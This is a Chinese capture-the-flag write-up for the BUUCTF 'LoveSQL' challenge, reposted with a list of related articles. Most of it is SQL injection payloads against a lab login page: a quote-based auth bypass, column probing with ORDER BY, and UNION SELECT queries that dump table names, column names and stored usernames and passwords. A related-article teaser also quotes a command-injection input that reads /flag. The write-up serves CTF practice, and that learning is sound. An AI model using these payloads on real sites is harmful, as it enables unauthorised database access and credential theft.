BUUCTF（八）[极客大挑战 2019]LoveSQL

BUUCTF

1.打开题目

注入方法可参考NewsCenter

2.测试注入点

username: 1'or'1=1

password: 1'or'1=1

登录成功，说明存在注入漏洞。

下面测试位点个数。

/check.php?username=admin' order by 3%23&password=1   正常回显

/check.php?username=admin' order by 4%23&password=1   报错

%23为“#”符号的URL编码形式

3.查库

联合查询注入 可参考NewsCenter

/check.php?username=-1'union select 1,2,database()%23&password=1

4.查表

/check.php?username=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

当前库下有两个表geekuser l0ve1ysq1，我们先看看l0ve1ysq1

5.查字段

/check.php?username=-1' union select 1,2, group_concat(column_name)  from information_schema.columns where table_name=0x6c3076653179737131%23&password=1

注:

0x代表16进制

6c3076653179737131为l0ve1ysql的16进制形式

6.查值

/check.php?username=-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

BUUCTF（八）[极客大 挑战 2019]LoveSQL的相关教程结束。

《BUUCTF（八）[极客大挑战 2019]LoveSQL.doc》

下载本文的Word格式文档，以方便收藏与打印。

相关推荐

《啊哈C语言——逻辑的挑战》学习笔记

第一章梦想启航第1节让计算机开口说话 1、基础知识 1）计算机“说话”的两种方式显示在屏幕上通过喇叭发出声音 2）计算机“说话”之显示在屏幕上格式：printf(""); 注意： printf要加“f” printf后要加括号() 双...
2023-07-29编程代码学习笔记,挑战,逻辑
解密“CDO-首席数据官”的价值、挑战及发展

数据，不论形态、格式和类型，已经迅速成为企业最有战略意义的资产；数据资产已经成为了可以形成业务洞察及优势的战略资源，数据的体量、多样性和复杂性也正以指数级增长。就像其他重要的企业资产，数据需要适当...
2023-06-25编程教程挑战,解密,首席
当Serverless遇到Regionless：现状与挑战

摘要：本文尝试基于分析现有的学术文章，剖析Serverless与Regionless并存时，在性能提升和成本控制两个方向的现状与挑战本文分享自华为云社区《当Serverless遇到Regionless：现状与挑战》，作者：云容器大未来...
2023-06-20编程教程Serverless,挑战,现状
BuuCTF Web Writeup

WarmUp index.php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0&...
2023-06-12编程教程buuctf,Web,Writeup
80%的用户在PoE部署方面面临挑战

根据一项对近800位以太网工程师、制造商、代理商、系统集成商、网络运营商及其他人员的最新调查，五分之四的用户在部署以太网供电(PoE)时会遇到很多挑战。以太网联盟在1月份进行的这项研究发现了一些重要的PoE...
2023-05-21编程教程poe,挑战,方面
[BUUCTF]Pwn刷题记录

本部分内容长期更新，不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F，即为15，这里的运行环境是64位，所以应当将Caller's rbp的数据填满，在这里是8位，即可构造payload from ...
2023-05-13编程教程buuctf,Pwn,题记
收益 or 挑战？Serverless 究竟给前端带来了什么

作者 | 黄子毅（紫益）阿里前端技术专家导读：前端开发者是最早享受到 “Serverless” 好处的群体，因为浏览器就是一个开箱即用、甚至无需为计算付费的环境！Serverless 把前端开发体验带入了后端，利用 FaaS ...
2023-05-09编程教程带来了,挑战,收益
[BUUCTF]Web刷题记录

为提升观感体验，本篇博文长期更新，新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令，经过测试是直接执行的，所以就直接命令执行了 127.0.0.1 | cat /flag 总结一...
2023-05-08编程教程buuctf,Web,题记